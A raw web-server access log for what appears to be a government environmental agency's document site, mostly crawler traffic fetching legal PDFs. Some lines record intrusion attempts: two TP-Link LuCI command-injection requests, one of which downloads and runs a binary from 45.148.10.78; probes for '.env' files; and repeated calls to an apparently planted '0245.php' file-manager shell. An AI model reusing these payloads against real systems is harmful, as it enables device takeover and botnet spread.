216.244.66.195 - - [29/Jun/2024:02:20:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201997/0299.pdf HTTP/1.1" 200 33851
201.245.192.253 - - [29/Jun/2024:02:21:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:02:21:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/00474.pdf HTTP/1.1" 200 3290515
66.249.66.11 - - [29/Jun/2024:02:21:29 -0500] "GET /bla/boletinlegal/Directivas/2018/Directiva%20No.%2027%20del%2028%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 2831879
66.249.66.11 - - [29/Jun/2024:02:21:30 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/0272.pdf HTTP/1.1" 304 -
216.244.66.195 - - [29/Jun/2024:02:21:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2905.pdf HTTP/1.1" 200 287409
216.245.221.92 - - [29/Jun/2024:02:21:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:21:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:22:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:02:22:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:02:20:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
216.244.66.195 - - [29/Jun/2024:02:22:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0968.pdf HTTP/1.1" 200 338068
135.181.214.38 - - [29/Jun/2024:02:22:20 -0500] "GET /Publicaciones/2023EE17143.pdf HTTP/1.1" 404 227
66.249.66.11 - - [29/Jun/2024:02:22:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3416.pdf HTTP/1.1" 200 1382027
216.244.66.195 - - [29/Jun/2024:02:22:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3037.pdf HTTP/1.1" 200 5412932
201.245.192.253 - - [29/Jun/2024:02:23:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:02:21:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
146.75.162.60 - - [29/Jun/2024:02:23:16 -0500] "GET /Publicaciones/2023EE02187.pdf HTTP/1.1" 404 227
66.249.66.11 - - [29/Jun/2024:02:23:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20351-400/00000393.tif HTTP/1.1" 200 62474
66.249.66.12 - - [29/Jun/2024:02:23:30 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202018/3753.pdf HTTP/1.1" 304 -
66.249.66.11 - - [29/Jun/2024:02:23:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3334.pdf HTTP/1.1" 200 516268
216.244.66.195 - - [29/Jun/2024:02:23:46 -0500] "GET /BLA/resoluciones/AUTOS%202023/2237.pdf HTTP/1.1" 200 363876
172.22.2.4 - - [29/Jun/2024:02:22:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54913
201.245.192.253 - - [29/Jun/2024:02:23:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:24:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:02:24:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3782.pdf HTTP/1.1" 200 370420
66.249.66.12 - - [29/Jun/2024:02:24:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3740.pdf HTTP/1.1" 200 1642103
201.245.192.253 - - [29/Jun/2024:02:25:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.51.71 - - [29/Jun/2024:02:25:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4214.pdf HTTP/1.1" 200 2735
66.249.66.11 - - [29/Jun/2024:02:25:22 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes%20relacionadas%20con%20calidad%20del%20aire%20auditiva%20y%20visual/Solicitudes%20relacionadas%20a%20Programa%20de%20Autorregulaci%F3n%20Ambiental/&sort=size&order=asc HTTP/1.1" 200 3841
47.128.124.180 - - [29/Jun/2024:02:25:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2307.PDF HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:02:25:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.30.199 - - [29/Jun/2024:02:25:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3253.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:02:26:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:02:26:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1393.pdf HTTP/1.1" 200 408925
216.244.66.195 - - [29/Jun/2024:02:26:11 -0500] "GET /BLA/resoluciones/AUTOS%202015/01253.pdf HTTP/1.1" 200 208274
47.128.120.245 - - [29/Jun/2024:02:26:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3329.pdf HTTP/1.1" 200 2714
47.128.45.66 - - [29/Jun/2024:02:26:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3415.pdf HTTP/1.1" 200 2740
66.249.66.11 - - [29/Jun/2024:02:26:32 -0500] "GET /BLA/resoluciones/AUTOS%202023/1955.pdf HTTP/1.1" 200 514006
47.128.111.98 - - [29/Jun/2024:02:26:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3544.pdf HTTP/1.1" 200 2740
216.245.221.92 - - [29/Jun/2024:02:26:51 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [29/Jun/2024:02:26:53 -0500] "GET /BLA/resoluciones/AUTOS%202023/00768.pdf HTTP/1.1" 200 315946
201.245.192.253 - - [29/Jun/2024:02:26:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:02:27:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.38.44 - - [29/Jun/2024:02:27:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2322.PDF HTTP/1.1" 200 2740
168.119.253.21 - - [29/Jun/2024:02:27:09 -0500] "GET / HTTP/1.1" 200 4720
162.19.75.207 - - [29/Jun/2024:02:27:10 -0500] "GET /Publicaciones/2023EE13108.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:02:27:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36531
201.245.192.253 - - [29/Jun/2024:02:27:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35408
66.249.66.12 - - [29/Jun/2024:02:27:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2642.pdf HTTP/1.1" 200 413408
47.128.38.52 - - [29/Jun/2024:02:27:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3417.pdf HTTP/1.1" 200 2740
216.244.66.195 - - [29/Jun/2024:02:27:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/01327.pdf HTTP/1.1" 200 347724
47.128.38.87 - - [29/Jun/2024:02:27:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2881.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:02:27:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.38.8 - - [29/Jun/2024:02:27:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3506.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [29/Jun/2024:02:28:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.33.32 - - [29/Jun/2024:02:28:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2412.pdf HTTP/1.1" 200 2714
66.249.66.12 - - [29/Jun/2024:02:28:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201301-1350/20021309.tif HTTP/1.1" 200 121220
157.55.39.12 - - [29/Jun/2024:02:28:18 -0500] "GET /BLA/resoluciones/AUTOS%202022/1622.pdf HTTP/1.1" 200 624838
47.128.33.68 - - [29/Jun/2024:02:28:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3412.pdf HTTP/1.1" 200 2714
66.249.66.11 - - [29/Jun/2024:02:28:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2630.pdf HTTP/1.1" 200 436479
216.244.66.195 - - [29/Jun/2024:02:28:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2456.pdf HTTP/1.1" 200 328033
47.128.33.64 - - [29/Jun/2024:02:28:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4065.pdf HTTP/1.1" 200 2714
172.22.2.4 - - [29/Jun/2024:02:27:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:29:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.39.207 - - [29/Jun/2024:02:29:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3232.pdf HTTP/1.1" 200 2739
157.55.39.12 - - [29/Jun/2024:02:29:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0336.pdf HTTP/1.1" 200 480810
201.245.192.253 - - [29/Jun/2024:02:29:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35534
47.128.33.27 - - [29/Jun/2024:02:29:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=03832.pdf HTTP/1.1" 200 2741
216.244.66.195 - - [29/Jun/2024:02:29:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5781.pdf HTTP/1.1" 200 76448
47.128.56.91 - - [29/Jun/2024:02:29:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3098.pdf HTTP/1.1" 200 2714
172.22.2.4 - - [29/Jun/2024:02:28:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55442
66.249.66.11 - - [29/Jun/2024:02:29:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3911.pdf HTTP/1.1" 200 4789041
201.245.192.253 - - [29/Jun/2024:02:29:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.26.228 - - [29/Jun/2024:02:29:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6862.pdf HTTP/1.1" 200 2714
66.249.66.14 - - [29/Jun/2024:02:29:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2362.pdf HTTP/1.1" 200 341443
201.245.192.253 - - [29/Jun/2024:02:30:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
173.239.214.165 - - [29/Jun/2024:02:30:05 -0500] "GET /.env HTTP/1.1" 404 1018
47.128.43.98 - - [29/Jun/2024:02:30:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=1639.PDF HTTP/1.1" 200 2900
173.239.214.157 - - [29/Jun/2024:02:30:20 -0500] "POST / HTTP/1.1" 200 319
47.128.43.69 - - [29/Jun/2024:02:30:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3560.pdf HTTP/1.1" 200 2714
47.128.115.156 - - [29/Jun/2024:02:30:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4362.pdf HTTP/1.1" 200 2714
40.77.167.45 - - [29/Jun/2024:02:30:53 -0500] "GET /BLA/resoluciones/AUTOS%202023/4735.pdf HTTP/1.1" 200 403196
201.245.192.253 - - [29/Jun/2024:02:31:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:02:31:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0627.pdf HTTP/1.1" 200 333207
216.245.221.92 - - [29/Jun/2024:02:31:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:30:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [29/Jun/2024:02:31:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:31:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:02:32:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:32:33 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%2011%20del%2027%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 304 -
66.249.66.11 - - [29/Jun/2024:02:32:37 -0500] "GET /BLA/resoluciones/AUTOS%202020/0950.pdf HTTP/1.1" 200 1589486
216.244.66.195 - - [29/Jun/2024:02:32:46 -0500] "GET /BLA/resoluciones/AUTOS%202022/0783.pdf HTTP/1.1" 200 2383860
66.249.66.11 - - [29/Jun/2024:02:32:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0482.pdf HTTP/1.1" 200 372544
66.249.66.11 - - [29/Jun/2024:02:32:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2387.pdf HTTP/1.1" 200 370365
172.22.2.4 - - [29/Jun/2024:02:32:56 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000001%20DEL%2011%20DE%20ENERO%20DEL%202024.pdf HTTP/1.1" 200 298890
201.245.192.253 - - [29/Jun/2024:02:32:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:02:33:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201001-1050/2002RES1008.tif HTTP/1.1" 200 310718
173.239.214.167 - - [29/Jun/2024:02:33:25 -0500] "GET /.env HTTP/1.1" 404 1018
173.239.214.176 - - [29/Jun/2024:02:33:30 -0500] "POST / HTTP/1.1" 200 319
66.249.66.11 - - [29/Jun/2024:02:33:33 -0500] "GET /BLA/resoluciones/AUTOS%202023/1954.pdf HTTP/1.1" 200 370928
216.244.66.195 - - [29/Jun/2024:02:33:39 -0500] "GET /BLA/resoluciones/AUTOS%202022/2885.pdf HTTP/1.1" 200 955482
66.249.66.11 - - [29/Jun/2024:02:33:53 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/Evaluaci%F3n%20y%20seguimiento%20de%20permisos%20de%20aprovechamiento%20de%20fauna%20silvestre/&sort=name&order=desc HTTP/1.1" 200 4607
66.249.66.11 - - [29/Jun/2024:02:33:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1546.pdf HTTP/1.1" 200 564318
201.245.192.253 - - [29/Jun/2024:02:33:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:33:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:02:34:11 -0500] "GET /BLA/resoluciones/AUTOS%202023/0865.pdf HTTP/1.1" 200 754708
141.98.83.197 - - [29/Jun/2024:02:34:21 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [29/Jun/2024:02:34:21 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
172.22.2.4 - - [29/Jun/2024:02:33:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.13 - - [29/Jun/2024:02:34:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5360.pdf HTTP/1.1" 200 341471
216.244.66.195 - - [29/Jun/2024:02:34:46 -0500] "GET /BLA/resoluciones/AUTOS%202023/3391.pdf HTTP/1.1" 200 2408808
201.245.192.253 - - [29/Jun/2024:02:34:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:02:35:18 -0500] "GET /galeria/galeria/fotos/Grande3Parque-nacional.jpg HTTP/1.1" 200 299919
172.22.2.4 - - [29/Jun/2024:02:33:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
201.245.192.253 - - [29/Jun/2024:02:35:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [29/Jun/2024:02:35:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5114.pdf HTTP/1.1" 200 493442
201.245.192.253 - - [29/Jun/2024:02:36:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
37.120.164.104 - - [29/Jun/2024:02:36:47 -0500] "GET /Publicaciones/2023EE07387.pdf HTTP/1.1" 404 227
216.245.221.92 - - [29/Jun/2024:02:36:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:36:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:02:36:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:37:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5231.pdf HTTP/1.1" 200 458805
201.245.192.253 - - [29/Jun/2024:02:37:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:37:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:38:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20401-450/00000429.tif HTTP/1.1" 200 58792
201.245.192.253 - - [29/Jun/2024:02:38:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35408
201.245.192.253 - - [29/Jun/2024:02:37:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36531
66.249.66.11 - - [29/Jun/2024:02:38:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2773.pdf HTTP/1.1" 200 419321
201.245.192.253 - - [29/Jun/2024:02:38:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:02:39:12 -0500] "GET /BLA/resoluciones/AUTOS%202024/00879.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:02:39:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35534
66.249.66.11 - - [29/Jun/2024:02:39:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2817.pdf HTTP/1.1" 200 407162
201.245.192.253 - - [29/Jun/2024:02:39:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:39:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:02:38:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.13 - - [29/Jun/2024:02:40:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3157.pdf HTTP/1.1" 200 711594
201.245.192.253 - - [29/Jun/2024:02:40:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:02:39:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52783
201.245.192.253 - - [29/Jun/2024:02:40:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 21442
216.245.221.92 - - [29/Jun/2024:02:41:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:41:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:02:41:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:41:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:02:42:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0613.pdf HTTP/1.1" 200 355730
66.249.66.13 - - [29/Jun/2024:02:42:53 -0500] "GET /BLA/resoluciones/AUTOS%202020/2883.pdf HTTP/1.1" 200 376390
201.245.192.253 - - [29/Jun/2024:02:42:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:43:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%2051-100/2002RES70.tif HTTP/1.1" 200 74606
66.249.66.11 - - [29/Jun/2024:02:43:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7243.pdf HTTP/1.1" 200 393450
66.249.66.13 - - [29/Jun/2024:02:43:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4392.pdf HTTP/1.1" 200 373399
201.245.192.253 - - [29/Jun/2024:02:43:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:43:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:02:44:34 -0500] "GET /autoliquidacion/Auto%20Declaraci%C3%B3nTr%C3%A1mite%20de%20Licenciamiento%20Urban%C3%ADstico%20y%20Actos%20de%20Reconocimiento%20de%20Usos%20Industriales/Anexo%202.%20Autodeclaraci%C3%B3n%20por%20impacto%20ambiental%20-%20Producci%C3%B3n%20artesanal%20e%20industria%20livian.pdf HTTP/1.1" 200 279699
201.245.192.253 - - [29/Jun/2024:02:44:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:45:00 -0500] "GET /BLA/resoluciones/AUTOS%202007/1919.pdf HTTP/1.1" 200 90400
66.249.66.12 - - [29/Jun/2024:02:45:33 -0500] "GET /BLA/resoluciones/AUTOS%202023/5581.pdf HTTP/1.1" 200 418037
216.244.66.195 - - [29/Jun/2024:02:45:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/1931.PDF HTTP/1.1" 200 96220
66.249.66.11 - - [29/Jun/2024:02:45:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1063.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:02:45:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:45:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:02:46:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1039.pdf HTTP/1.1" 200 229397
47.128.49.55 - - [29/Jun/2024:02:46:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3318.pdf HTTP/1.1" 200 2714
172.22.2.4 - - [29/Jun/2024:02:44:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.9 - - [29/Jun/2024:02:46:36 -0500] "GET /Publicaciones/2024EE123315.pdf HTTP/1.1" 404 228
47.128.17.82 - - [29/Jun/2024:02:46:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5145.pdf HTTP/1.1" 200 2714
216.244.66.195 - - [29/Jun/2024:02:46:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0696.pdf HTTP/1.1" 200 199607
216.245.221.92 - - [29/Jun/2024:02:46:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:46:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.121.8 - - [29/Jun/2024:02:46:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=6850.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:02:46:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:47:02 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes%20relacionadas%20con%20calidad%20del%20aire%20auditiva%20y%20visual/Evaluaci%F3n%20de%20estudios%20de%20Emisiones%20con%20miras%20a%20verificar%20el%20cumplimiento%20de%20las%20normas%20de%20emisiones/&sort=date&order=desc HTTP/1.1" 200 3250
216.244.66.195 - - [29/Jun/2024:02:47:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1004.pdf HTTP/1.1" 200 208543
172.22.2.4 - - [29/Jun/2024:02:45:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
47.128.121.79 - - [29/Jun/2024:02:47:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=7252.pdf HTTP/1.1" 200 2740
47.128.36.102 - - [29/Jun/2024:02:47:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=03684.pdf HTTP/1.1" 200 2714
66.249.66.11 - - [29/Jun/2024:02:47:34 -0500] "GET /BLA/resoluciones/AUTOS%202023/3014.pdf HTTP/1.1" 200 318692
216.244.66.195 - - [29/Jun/2024:02:47:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1009.pdf HTTP/1.1" 200 143476
66.249.66.11 - - [29/Jun/2024:02:47:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20601-650/00000624.tif HTTP/1.1" 200 42832
47.128.37.48 - - [29/Jun/2024:02:47:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4296.pdf HTTP/1.1" 200 2740
